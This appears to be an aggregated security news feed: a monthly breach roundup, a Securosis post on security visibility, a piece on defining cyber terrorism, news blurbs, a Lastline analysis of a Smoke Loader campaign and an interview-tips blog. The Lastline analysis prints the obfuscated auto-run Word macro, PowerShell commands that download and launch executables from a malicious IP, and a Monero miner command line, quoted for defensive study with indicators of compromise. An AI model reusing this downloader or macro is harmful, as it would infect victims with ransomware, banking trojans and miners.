The UK Information Commission's Office (ICO) heavily criticised the Carphone Warehouse for security inadequacies and fined the company £400K following their 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers, was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack", where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number Carphone Warehouse's security failures, which included the use of software that was six years out of day,  lack of “rigorous controls” over who had login details to systems; no antivirus protection running on the servers holding data, the same root password being used on every individual server, which was known to “some 30-40 members of staff”; and the needless storage of full credit card details. The Carphone Warephone should thank their lucky stars the breach didn't occur after the General Data Protection Regulation comes into force, as with such a damning list of security failures, the company may well have been fined considerably more by ICO, when it is granted vastly greater financial sanctions and powers when the GDPR kicks in May.

The National Cyber Security Centre warned the UK national infrastructure faces serious nation-state attacks, stating it is a matter of a "when" not an "if". There also claims that the cyberattacks against the Ukraine in recent years was down to Russia testing and tuning it's nation-state cyberattacking capabilities. 

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPeyta ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet, the hacker then moved currency into a different wallet platform.

In the United States, 
the Federal Trade Commission (FTC) fined toy firm VTech US$ 650,000 (£482,000) for violating a US children's privacy laws. The FTC alleged the toy company violated (COPPA) Children's Online Privacy Protection Rule by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high valued target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January,  the Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents have doubled in 2017 and 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both the professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and the number of attacks skyrocketed during the course of the year, no surprise there.  

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.

NEWS

AWARENESS, EDUCATION AND THREAT INTELLIGENCE

REPORTS

Evolving to Security Decision Support: Visibility is Job #1

Posted under: Research and Analysis

To demonstrate our mastery of the obvious, it’s not getting easier to detect attacks. Not that it was ever really easy, but at least you used to know what tactics adversaries used, and you had a general idea of where they would end up, because you knew where your important data was, and which (single) type of device normally accessed it: the PC. It’s hard to believe we now long for the days of early PCs and centralized data repositories.

But that is not today’s world. You face professional adversaries (and possibly nation-states) who use agile methods to develop and test attacks. They have ways to obfuscate who they are and what they are trying to do, which further complicate detection. They prey on the ever-present gullible employees who click anything to gain a foothold in your environment. Further complicating matters is the inexorable march towards cloud services – which moves unstructured content to cloud storage, outsources back-office functions to a variety of service providers, and moves significant portions of the technology environment into the public cloud. And all these movements are accelerating – seemingly exponentially.

There has always been a playbook for dealing with attackers when we knew what they were trying to do. Whether or not you were able to effectively execute on that playbook, the fundamentals were fairly well understood. But as we explained in our Future of Security series, the old ways don’t work any more, which puts practitioners behind the 8-ball. The rules have changed and old security architectures are rapidly becoming obsolete. For instance it’s increasingly difficult to insert inspection bottlenecks into your cloud environment without adversely impacting the efficiency of your technology stack. Moreover, sophisticated adversaries can use exploits which aren’t caught by traditional assessment and detection technologies – even if they don’t need such fancy tricks often.

So you need a better way to assess your organization’s security posture, detect attacks, and determine applicable methods to work around and eventually remediate exposures in your environment. As much as the industry whinges about adversary innovation, the security industry has also made progress in improving your ability to assess and detect these attacks. We have written a lot about threat intelligence and security analytics over the past few years. Those are the cornerstone technologies for dealing with modern adversaries’ improved capabilities.

But these technologies and capabilities cannot stand alone. Just pumping some threat intel into your SIEM won’t help you understand the context and relevance of the data you have. And performing advanced analytics on the firehose of security data you collect is not enough either, because you might be missing a totally new attack vector.

What you need is a better way to assess your organizational security posture, determine when you are under attack, and figure out how to make the pain stop. This requires a combination of technology, process changes, and clear understanding of how your technology infrastructure is evolving toward the cloud. This is no longer just assessment or analytics – you need something bigger and better. It’s what we now call Security Decision Support (SDS). Snazzy, huh?

In this blog series, “Evolving to Security Decision Support”, we will delve into these concepts to show how to gain both visibility and context, so you can understand what you have to do and why. Security Decision Support provides a way to prioritize the thousands of things you can do, enabling you to zero in on the few things you must.

As with all Securosis’ research developed using our Totally Transparent methodology, we won’t mention specific vendors or products – instead we will focus on architecture and practically useful decision points. But we still need to pay the bills, so we’ll take a moment to thank Tenable, who has agreed to license the paper once it’s complete.

Visibility in the Olden Days

Securing pretty much anything starts with visibility. You can’t manage what you can’t see – and a zillion other overused adages all illustrate the same point. If you don’t know what’s on your network and where your critical data is, you don’t have much chance of protecting it.

In the olden days – you know, way back in the early 2000s – visibility was fairly straightforward. First you had data on mainframes in the data center. Even when we started using LANs to connect everything, data still lived on a raised floor, or in a pretty simple email system. Early client/server systems started complicating things a bit, but everything was still on networks you controlled in data centers you had the keys to. You could scan your address space and figure out where everything was, and what vulnerabilities needed to be dealt with.

That worked pretty well for a long time. There were scaling issues, and a need (desire) to scan higher in the technology stack, so we started seeing first stand-alone and then integrated application scanners. Once rogue devices started appearing on your network, it was no longer sufficient to scan your address space every couple weeks, so passive network monitoring allowed you to watch traffic and flag (and assess) unknown devices.

Those were the good old days, when things were relatively simple. Okay – maybe not really simple, but you could size the problem. That is no longer the case.

Visibility Challenged

We use a pretty funny meme in many of our presentations. It shows a man from the 1870s, remembering blissfully the good old days when he knew where his data was. That image always gets a lot of laughs from audiences. But it’s brought on by pain, because everyone in the room knows it illustrates a very real problem. Nowadays you don’t really know where your data is, which seriously compromises your capability to determine the security posture of the systems with access to it.

These challenges are a direct result of a number of key technology innovations:

  • SaaS: Securosis talks about how SaaS is the New Back Office, and that has rather drastic ramifications for visibility. Many organizations deploy CASB just to figure out which SaaS services they are using, because it’s not like business folks ask permission to use a business-oriented service. This isn’t a problem that’s going away. If anything more business processes will move to SaaS.
  • IaaS: Speaking of cloudy stuff, you have teams using Infrastructure as a Service (IaaS) – either moving existing systems out of your data centers, or building new systems in the cloud. IaaS really changes how you assess your environment, breaking most old techniques. Scanning is a lot harder, and some of the ‘servers’ (now called instances) live only for a few hours. Network addressing is different, and you cannot really implement taps to see all traffic. It’s a different world, where you are pretty much blind until you come up to speed with new techniques to replace tricks the cloud broke.
  • Containers: Another new foundational technology, containers bring much better portability and flexibility to building and deployment of application components. Without going into detail about why they’re cool, suffice it to say that your developers are likely working extensively with containers as they architect new applications, especially in the cloud. But containers bring new visibility and security challenges, in part because they are short-lived (they spin up and down automatically, responding to load and other triggers), self-contained (usually not externally addressable) and don’t provide access for traditional scans. They pretty well break existing discovery and assessment processes.
  • Mobility: It seems kind of old hat to even be mentioning the fact that you have critical data on smart devices (phones and tablets), but they expand your attack surface and make it hard to understand where your data is and how those devices are configured.
  • IoT: A little further out toward the horizon is the Internet of Things (IoT). Some argue it’s here today, and with the number of sensors being deployed and smart systems already network connected, they may be right. But either way, if you look even just a year or two out into the future, you can bet there will be a lot more network connected devices accessing your data and expanding your attack surface. So you’ll need to find and assess them.

And we are just getting started. It won’t be long before the next discontinuous innovation makes it harder to figure out where critical data resides and what’s happening with it. To put a bow on the challenges you face, we’ll talk about some reasonable bets to make. We are confident there will be more cloud tomorrow than today. And equally confident more devices accessing will be your stuff tomorrow. And that’s pretty much all you need to know to understand the extent and magnitude of the problem.

Challenge Accepted

To again state the obvious, it’s hard to be a security professional nowadays. We get it. But curling up into the fetal position on your data center floor isn’t an option. First of all, you may not even have a data center any more. And if you do it might have been repurposed as warehouse space or sold off to a cloud provider. But even if you have a place, curling up won’t actually solve any problems.

So what can you do? Remember you cannot manage or protect what you cannot see, so we need to focus on visibility as the first step toward Security Decision Support. Visibility across the enterprise, wherever your data resides, on whatever platform. That means discovery and assessment of all your stuff.

We’re pretty sure you haven’t been able to totally shut off your data centers and move everything to SaaS and IaaS – even though you might want to – so you need to make sure you aren’t missing anything within your traditional infrastructure. You need to continue your existing vulnerability management program.

  • Network, security, databases, and systems: You already scan your network and security devices, all the servers you control, and probably your databases as well (thanks, compliance mandates!), so you’ll keep doing all that. Hopefully you have been evolving your vulnerability management environment, and have some means of prioritizing all the stuff in your environment.
  • Applications: You are likely scanning your web applications as well. That’s a good thing – keep doing it. And working with developers to ensure they are fixing the issues you find before deploying them to millions of customers. Obviously as developers continue to adapt agile methods of building software, you will still need to evangelize finding issues with your application stacks and – given the velocity of software changes – fixing them faster.

That’s the stuff that you should already be doing. Maybe not as well as you should (there is always room for improvement, right?), but at least for compliance you are probably already doing something. It gets interesting when discovery and assessment intersect the new environments and innovations you need to grapple with. Let’s look at the innovations above, for a sense for how they change things in the new world.

SaaS

As mentioned, many of you have deployed a CASB (Cloud Access Security Broker) to monitor your network egress traffic and figure out which SaaS services you are actually using. It’s always entertaining to hear about a vendor asking a customer how many SaaS services they think are use and hear back: maybe a couple dozen. And then the vendor (with great dramatic effect) always seems to drop a report on the deck – it’s closer to 1,500.

To be clear, you don’t need a purpose-built device or service to figure out SaaS in use – many secure web gateways offer this kind of visibility, as do DLP solutions to control exfiltration. BUt one method of discovery is to examine egress traffic.

Another kind of discovery and assessment is through each SaaS provider’s API (Application Programming Interface). The more mature SaaS companies understand that visibility is a problem, so they offer reasonable granularity for usage and activity via API. You can pull this information down and integrate it with other security data for analysis. We’ll dig into this analysis in our next post.

IaaS

As your organization moves existing systems and builds new applications in the cloud you will need to work more proactively to get a sense of which resources actually live in the cloud. Unlike SaaS, where someone is presumably connecting to a service from inside your organization, where you have a chance to see it, an egress filter cannot provide much detail about what’s running within or going into a public cloud service.

In this case the API really is your friend. Any tools that focus on visibility need to poll the cloud provider’s API to learn what systems are running in their environment and assess them. One caution is the API limitations of some cloud providers. You cannot make infinite API calls to any cloud provider for obvious reasons, so you need to design your IaaS environment with this in mind.

We favor cloud architectures which use multiple accounts per application for many reasons. Overcoming API limitations is one, as well as minimizing the blast radius of an attack with stronger functional isolation between applications. Yet, that’s a much larger discussion for a different day, but see our latest video if you’re interested.

Befriend the Accountants

One general point about cloud services should already be familiar, from many contexts: follow the money. For both SaaS and IaaS, the only thing we can be sure of is that someone is getting paid for any services you use. So whoever pays the bills should be able to let you know – at least at a gross level – which services are in use, with pointers to who can tell you more.

So make sure you are friendly with Accounting. Take them out to lunch from time to time. Support their charitable causes. Whatever it takes to keep them on your side and responsive to your requests for accounting records for cloud services.

Of course an Accounting report is no replacement for pulling information from APIs or monitoring egress traffic. Attackers move fast and can do a lot of damage in the time it takes a provider to bill you, and Accounting to receive a bill and process it. Don’t just accept that 4-6 week delay behind events happening. So use this kind of information to verify what you should already know. And to identify the stuff you should know about, but perhaps don’t yet.

Containers

Containers encapsulate micro-services which are often not persistent, and cannot really be accessed or scanned from external entities (like vulnerability scanners), a separate capability to discover and assess containers won’t really work. So you need to build discovery and assessment into your container system. First make sure any of the containers you build are not vulnerable, by integrating assessment into your container build process. Any container you spin up should be built using an image which is not vulnerable.

Then track usage of your containers to make sure nothing drifts, which requires inserting some kind of technology (an agent or API call) into the build/deploy stage as containers spin up. That technology will track each container through its lifecycle and report back to your central repository and watch for signs of attack. Like most of security, you can’t really bolt this on later. So when you finish buying pizza for Accounting, you might want to have happy hour with the developers. Without their participation you’ll have little visibility into your container environment.

Mobility

It has been a while since you could stick your head in the sand and hope that mobile devices would turn out to be a passing fad. Today they are full participants in the IT environment, and innovative new applications are being rolled out to derive business advantage from their flexibility. But as any technology becomes ubiquitous, solutions emerge to address common problems.

Even after consolidation there are dozens of solutions to provide mobile device visibility and assessment. To access corporate data or install purpose-built mobile apps, any device should need to be registered with the corporate Mobile Device Management (MDM) environment. These platforms can provide an inventory not just of devices, but also what is installed on each device. More sophisticated offerings now can block certain apps from running, or stop a device from accessing some networks based on its configuration and assessment.

That’s the good news, but there is still work to be done to integrate that information into the rest of the Security Decision Support stack. You should be able to use telemetry from your MDM environment in your security analytics strategy. For example a person’s mobile device accessing cloud data stores they aren’t authorized to look at, or their desktop performing reconnaissance on the finance network – or even both! – might well indicate a compromise. Your analytics should detect and connect both events across the enterprise. But let’s not get ahead of ourselves – our next post will dive into analytics.

IoT

The problem with most IoT devices is they aren’t your run-of-the-mill PCs or mobile devices. They likely don’t have an API you can poll to figure out what’s going on, nor can you install an agent to monitor all activity. And these devices often appear on network segments which are less monitored and protected, such as the shop floor or the security video network.

Detecting the presence of these devices, assessing their security, and looking for potential misuse all require a different approach which is largely passive. Your best bet is to monitor those networks, profile the devices on each network, baseline typical traffic patterns, and then watch for devices acting unusually. Yet, it is more challenging than collecting NetFlow records from the shop floor network. IoT devices often use non-standard proprietary protocols, which further complicate discovery and assessment. As you account for these devices in your Security Decision Support strategy you’ll need to weigh the complexity of identifying and assessing such devices against the risk they pose.

(Re)Visitation

Of course we need a few caveats around these concepts. First, emerging technologies are moving targets. Let’s take IaaS as an example. Like other technology providers, cloud providers are rapidly introducing APIs and other mechanisms to provide a view into their environments. Device makers across all device types realize customers want to manage their technology as part of a larger system, so many (but not all, alas) are providing better access to their innards in more flexible ways. That’s the kind of progress you like to see.

But tomorrow’s promise cannot solve today’s problem. You need to build a process and implement tooling based on what’s available today. So build periodic reassessment into your SDS process, similar to how you probably revisit malware detection periodically.

We know reviewing your enterprise visibility approaches can be time-consuming, and expensive when something needs to change. Reversing course on decisions you made over the past year can be frustrating. But that’s the world we live in, and resisting will just cost worse in the long run. If you expect from the get-go to revisit all these decisions, and at times to toss some tools and embrace others, that makes it easier to take. Even more important, managing management expectations that this might happen (quite likely), will go a long way to maintaining your employment.

In summary, the first step toward Security Decision Support is enterprise visibility and understanding the exposure of assets and data, wherever they are. Next we’ll dig into figuring out what’s really at risk by integrating an external view of the security world (threat intel) and more sophisticated analytics of internal security data you collect.

- Mike Rothman (0) Comments Subscribe to our daily email digest

Declaring War on Cyber Terrorism…or Something Like That

This post is co-authored by Deana Shick, Eric Hatleback and Leigh Metcalf

Buzzwords are a mainstay in our field, and "cyberterrorism" currently is one of the hottest. We understand that terrorism is an idea, a tactic for actor groups to execute their own operations. Terrorists are known to operate in the physical world, mostly by spreading fear with traditional and non-traditional weaponry. As information security analysts, we also see products where "terrorists" are ranked in terms of sophistication, just like any other cyber threat actor group. But how does the definition of "terrorism" change when adding the complexities of the Internet? What does the term "cyber terrorism" actually mean?

We identified thirty-seven (37) unique definitions of "cyber terrorism" drawn from academic and international-relations journals, the web, and conference presentations. These definitions date back as far as 1998, with the most recent being published in 2016. We excluded any circular definitions based on the findings in our set. We broke down these definitions into their main components in order to analyze and compare definitions appropriately. The definitions, as a whole, broke into the following thirteen (13) categories, although no single definition included all of them at once:

  • Against Computers: Computers are a necessary target of the action.
  • Criminals: Actions performed are criminal acts, according to the relevant applicable law.
  • Fear: The action is intended to incite fear in the victims.
  • Hacking: The attempt to gain unauthorized access into a targeted network.
  • Religion: Religious tenants are a motivator to perform actions.
  • Socially Motivated: Social constructs motivate to perform action on objectives.
  • Non-State Actors: Individuals or groups not formally allied to a recognized country or countries.
  • Politics: The political atmosphere and other occurances within a country or countries motivate action.
  • Public Infrastructure: Government-owned infrastructure is a target of the action.
  • Against the public: Actions performed against a group of people, many of which are bystanders.
  • Terrorism: Violence perputrated by individuals to intimidate others into action.
  • Using Computers: Computers are used during actions on objectives.
  • Violence: The use of force to hurt or damage a target.

After binning each part of the definitions into these categories, we found that there is no consensus definition for "cyber terrorism." Our analysis of each definition is found in Figure 1. A factor that might explain the diversity of opinions could be the lack of a singular, agreed upon definition for "terrorism" on the international stage, even before adding the "cyber" adjective. So, what does this mean for us?

In the information security field, vendors, analysts, and researchers tend to slap the term "cyber" onto any actions involving an internet connection. While this may be appropriate in some cases, terrorism does not seem to translate well into bytes and packets. Perhaps this is due to the physical, visceral nature that terrorists require to be successful, or perhaps it is due to the lack of a true use-case of a terrorist group successfully detonating a computer. We should remain mindful as a community not to perpetuate fear, uncertainty, or doubt by using terms and varying adjectives without a common understanding.

cyber-terrorism.png

Figure 1: Definitions found based on common bins

cyberterrorism-references.pdf

CUTV News Radio spotlights Michael Peters of Lazarus Alliance

CUTV News Radio spotlights Michael Peters of Lazarus Alliance

CUTV News Radio with veteran award-winning broadcast TV and radio hosts/media personalities Jim Masters and Doug Llewelyn is an exciting, informative, entertaining, thought-provoking and empowering broadcast series featuring several LIVE episodes daily and is a service of the Telly-award winning CUTV News, a full service media company that provides entrepreneurs, business owners and extraordinary people a platform to share their story worldwide.

The post CUTV News Radio spotlights Michael Peters of Lazarus Alliance appeared first on .

How to eliminate the default route for greater security

If portions of enterprise data-center networks have no need to communicate directly with the internet, then why do we configure routers so every system on the network winds up with internet access by default?

Part of the reason is that many enterprises use an internet perimeter firewall performing port address translation (PAT) with a default policy that allows access the internet, a solution that leaves open a possible path by which attackers can breach security.

+Also on Network World: IPv6 deployment guide; What is edge computing and how it’s changing the network?+

To read this article in full, please click here

(Insider Story)

Growing North Korean cyber capability

Recent missile launches from the DPRK have received a lot of attention, however their cyber offensives have also been active and are growing in sophistication. North Korean cyber attack efforts involve around 6,000 military operatives, within the structure of the Reconnaissance General Bureau (RGB) – part of the military of which Kim Jong-un is supreme …

Tactical Sweaters – Enterprise Security Weekly #78

This week, Paul and John interview Brendan O'Connor, Security CTO at ServiceNow, and John Moran, Senior Project Manager of DFLabs! In the news, we have updates from Twistlock, Microsoft, BeyondTrust, and more on this episode of Enterprise Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode78

 

Visit https://www.securityweekly.com/esw for all the latest episodes!

Smoke Loader Campaign: When Defense Becomes a Numbers Game

Authored by Alexander Sevtsov
Edited by Stefano Ortolani

Introduction

Everybody knows that PowerShell is a powerful tool to automate different tasks in Windows. Unfortunately, many bad actors know that it is also a sneaky way for malware to download its payload. A few days ago we stumbled upon an interesting macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16) that is making one too many assumptions about the underlying operating system, thus sometimes failing to execute.

The Malicious Document

The malicious document file consists of the following macro code:

Private Sub Document_Open()
    Dim abasekjsh() As Byte, bfjeslksl As String, izhkaheje As Long
    abasekjsh = StrConv(ThisDocument.BuiltInDocumentProperties(Chr(84) + Chr(105) + Chr(116) + 
Chr(108) + Chr(101)), vbFromUnicode)
    For izhkaheje = 0 To UBound(abasekjsh)
        abasekjsh(izhkaheje) = abasekjsh(izhkaheje) - 6
    Next izhkaheje
    bfjeslksl = StrReverse(StrConv(abasekjsh, vbUnicode))
    Shell (Replace(Replace(Split(bfjeslksl, "|")(1), Split(bfjeslksl, "|")(0), Chr(46)), 
"FPATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub

The macro itself is nothing special: it first reads the “Title” property by accessing the BuiltInDocumentProperties of the current document. The property value is then used to decode a PowerShell command line, which is eventually executed via the Shell method.

The PowerShell Downloader

Instead of using sophisticated evasion techniques, the malware relies on a feature available from PowerShell 3.0 onwards. To download the malicious code the command invokes the Invoke-WebRequest cmdlet:

powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile 
([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');powershell.exe -w 1 Start-Process -
Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');

This tiny detail has the side-effect of requiring Windows 8 and above for the command to complete successfully. Note that although PowerShell comes installed by default since Windows 7, PowerShell 3.0 is only available on Windows 7 as an optional update. Therefore any network activity can only be observed if the underlying operating system is at least Windows 8, or if Windows 7 has the specific update installed. In other words, the more diversity between our analysis environments, the more chances we can elicit the malicious behavior.

Payload – Smoke Loader

The payload is a variant of the Smoke Loader family (Figure 1) which shows quite a number of different activities when analyzed by the Lastline sandbox (sha1: f227820689bdc628de34cc9c21000f3d458a26bf):

Figure 1. Analysis overview of the Smoke Loader

As it often happens, signatures are not really informative as we can see in Figure 2.

Figure 2. VT detection of the Smoke Loader

The aim of this malware is to download other components by sending 5 different POST requests to microsoftoutlook[.]bit/email/send.php. While some are met with a 404 error, three are successful and download the following payloads:

  • GlobeImposter Ransomware eventually displaying the ransom note in Figure 3.
    Smoke Loader Ransom Note

    Figure 3. Ransom note of the GlobeImposter Ransomware delivered by the Smoke Loader.

  • Zeus trojan banker, also known as Zbot, capturing online banking sessions and stealing credentials from known FTP clients, such as FlashFXP, CuteFtp, WsFTP, FileZilla, BulletProof FTP, etc.
  • Monero CPU miner based on the open source XMRig project (as indicated by some of the strings included in the binary, see Figure 4). The command used to spawn the miner reveals some well-known pool id we have been seeing already:

wuauclt.exe -o stratum+tcp://ca.minexmr.com:443 -u 
49X9ZwRuS6JR74LzwjVx2tQRQpTnoQUzdjh76G3BmuJDS7UKppqjiPx2tbvgt27Ru6YkULZ
4FbnHbJZ2tAqPas12PV5F6te.smoke30+10000 -p x --safe

Figure 4. XMRig Monero CPU miner

Intelligence

It’s worth mentioning that it’s not the first time we have seen the IP address from which the loader is downloaded. Based on our intelligence records, another malicious VBA-based document file (sha1: 03a06782e60e7e7b724a0cafa19ee6c64ba2366b) called a similar PowerShell script that perfectly executed in a default Windows 7 installation:

powershell $webclient = new-object System.Net.WebClient;
$myurls = 'http://80.82.67[.]217/moo.jpg'.Split(',');
$path = $env: temp + '\~tmp.exe';
foreach($myurl in $myurls) {
    try {
        $webclient.DownloadFile($myurl.ToString(), $path);
        Start-Process $path;
        break;
    } catch {}
}

This variant downloads the payload by invoking the DownloadFile method from the System.Net.WebClient class, indeed a much more common (and backward compatible) approach to retrieve a remote resource.

Mitigation

There is an inherent problem with dynamic analysis: which version of the underlying operating system should be used? To address this issue, the Lastline engine is capable of running deep behavioral analysis on several different operating systems, increasing the probability of a successful execution. Moreover, application bundles (see previous article for more details) can be further used to shape the analysis environment when additional requirements are needed to elicit the malicious behavior.

Figure 5 shows what the analysis overview looks like when analyzing the sample discussed in this article: besides some reported structural anomalies, which are detected by our static document analysis, we can see that dynamic behaviors are exhibited only in Windows 10.

Figure 5. Analysis overview of the malicious macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16)

divider-2-whiteConclusion

In this article, we analyzed a malicious macro-based document relying on a specific version of PowerShell, thereby delivering a highly sophisticated multi-component malware, Smoke Loader. This is achieved by calling a cmdlet normally not available on PowerShell as installed in Windows 7, showing once more that operating system diversity is a key requirement for successful dynamic analysis.

Appendix: IoCsdivider-2-white

Files
The Malicious Document b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16
Smoke Loader f227820689bdc628de34cc9c21000f3d458a26bf
Monero CPU Miner 88eba5d205d85c39ced484a3aa7241302fd815e3
Zeus Trojan 54949587044a4e3732087a56bc1d36096b9f0075
GlobeImposter Ransomware f3cd914ba35a79317622d9ac47b9e4bfbc3b3b26
Network
80.82.67[.]217
107.181.254[.]15
Smoke Loader C&C microsoftoutlook[.]bit

The post Smoke Loader Campaign: When Defense Becomes a Numbers Game appeared first on Lastline.

Interview Tips: You’re in the interview room. Now what?

Interview Tips: You're in the interview room. Now what?

In my last blog post on Interview Tips: Prepare well before you take off, I reckon the facts you need to be sure off, before you reach the door of your next firm, or pick the call that will decide your next lap. Now, this blog post will focus on things to do during the interview, things that can make or break your attempt. It is imperative to prepare well for what do you want, what does the company do, and where you see yourself in few years. If this sounds new to you; please take a look at my previous blog post on preparation tips.

1. Basic manners, greetings and eye contact.

When you meet your employer, do understand you are a professional who's going for an interview - not for chit/chat, not for coffee, not for catchup. The first impression with the interviewer is often the lasting one. So, while you are wearing the nice ironed clothes, it's time to sit straight and have a notepad with you. It's vital that you learn more from the discussion, and therefore keep taking notes. If there's something you don't know, jot a pointer to it so you can cross check after your talk. It will show your keenness to learn, pay attention, and follow-up on the discussion.
When you meet the interviewer for the first time, make sure to get their name correctly, or ask for their business card. Also, you can address them by their name; if culturally you are not sure, ask them if it's okay to address by name. Then, introduce yourself with your full name for the first time with a confident handshake. After the interview, convey your thanks for taking out time, and meeting with you.

Update (01-Feb-2018): Thanks to PKI for a great tip which I missed to mention,

Interview Tips: You're in the interview room. Now what?

2. Avoid long essays, and be "to the point".

I have seen many times, candidates carry themselves with utter confidence (or some excitement) but start their responses like a long narration. Sometimes it's long enough that I have to interrupt their train of thought. A thumb rule is - If the question is objective; you should answer it in 30 seconds, and another 1 minute if you want to back it up with a fact. And if it's subjective like "why this happens..." or "how would you ..." restrict yourself to summarise it in 2-3 minutes until unless being asked to tell more.

If it's a question that involves historical events, tell the interviewer which chronological direction are you starting from, and then conclude it to the point. If the interviewer wants to know more, they will ask you to elaborate. But stick to the 2-3 minutes rule per lap, and then a pit-stop. Some typical questions that you must prepare for,

  1. Why should we hire you?
    Try highlighting your skillsets and how they match the with what they are looking for.
    Find the pain points, and the technologies they are using and how your experience can help them succeed.
  2. Tell me about yourself.
    Focus on the facts that supplement your resume. If the interviewer has processed your resume, surprise them with something that's not mentioned in the resume
  3. Do you have any questions?
    Make sure you do. When you have done an excellent preparation on the firm, you definitely would have curiosities, and queries.
3. Justify your answers, if required. Good or bad, but don't be a headless reporter.

If an interviewer asks to elaborate your answer, it means they are looking for more details to assess if you can walk the talk. Don't worry about the fact that they are judging you but be right to the point on where did you get this answer. Even if you just took a guess, tell them. Or, if you remember the answer but not the rationale, convey it frankly.
Needless to say but if you try to go deep into the well of lies, excuses and fabricating stories, you may just drown in the follow-up questions. Don't dig your well deeper with more made-up facts. An interviewer would at least appreciate if you are reliable and it's understandable that you don't remember the right reasoning, or all the events but gave your best true attempt. In sales, there is a phrase - Stop putting lipstick on a pig which means stop selling second rated products, or faulty products with smart marketing as it may bring a short-term win, but long-term loss.
In the end, you want to sell yourself as a rational person, who would not take decisions without any factual information to back it up. I admire the gut feeling or intuition, but then tell him that answer was a "gut feeling" answer; and don't build stories around it.

4. Be present in the moment. Control yourself, and don't get carried away.

A vital part of the interview process is to assess the candidate's presence of mind. I usually check their basics, presence of mind and awareness of what's happening around. In any domain, it is imperative to be aware of what is happening, what are the recent headlines around security topics and how is the world reacting to the evolution in your forte.
I remember meeting a candidate for an interview, and even though it was a technical interview; my questions were from his blog. He wrote some articles on security and was hosting it on a popular CMS system. I asked a few questions around his blog - why did you install this plugin, what does it do etc. I wanted to check his awareness of the topics, and specifically the technology he is using in his blog. Sometimes what matters is your depth of a particular field, and it is often assessed by taking you out of your comfort zone of mundane questions. He fumbled but was trying to answer the questions with best of his efforts, and understanding.
He might have failed the Q/A, but because of his approach and tenacity to improvise, he was selected.

It is essential to assess how someone approaches a problem statement. So, if you think you don't know the answer but can attempt to take it on; tell the interviewer that you don't see the solution straightforward, but you can try it with logic, experience, and some thought process. It doesn't mean you get 30 minutes just to answer this. Be quick on your toes to frame your strategy and it's okay to think out loud. Keep the interviewer in sync with your analysis of the problem statement so that they can understand your approach, and where it might lead.

5. A rejection doesn't mean you lost the war; not always!

Personal Experience: I appeared for multiple rounds of interviews with a firm. First level interview was with a senior team lead kind of guy, then his manager, HR and even a management round. They were not sure if I fit the bill and they decided to have the final round with the director. Long things short, after two months of interviews, I get an email which in short meant "thanks. We don't need you.". I felt bad that after investing a considerable time in last few months, all I received was "No". Knowing the company well, and having good discussions, I knew I was a good fit but there might have been other reasons. Anyways, during these two months, I did enough research on the company; it's people, the common pitfalls the company has been into etc. In all the interviews, I asked enough questions to assert my value proposition.

I wrote them back (keeping each interviewer in the loop) - "Thanks for your time and I understand your decision. I may not agree with it on the facts that currently you have ..." I listed some problem statements, and how I can contribute effective solutions. In short, that was my last pitch of selling my skill-set and effort to iron out some wrinkles with full tenacity but humble gesture. I concluded that note with "Appreciate your time, and I wish you my best in future endeavours."

Frankly speaking, I had no other intention than to appreciate the discussions and their help in my learning curve. All in good faith and courtesy. Few days after, I got an email from HR which was positively inclined to the fact that they want to hire me. Few formalities later the firm offered a position!

Bonus:

Share this blog via your social media channel as a 'public' post, and comment down with the link to it. I shall share a "tailored guide" for your next interview.
*Reserved only for first five people.

I wish you all the best and hope you find your match :)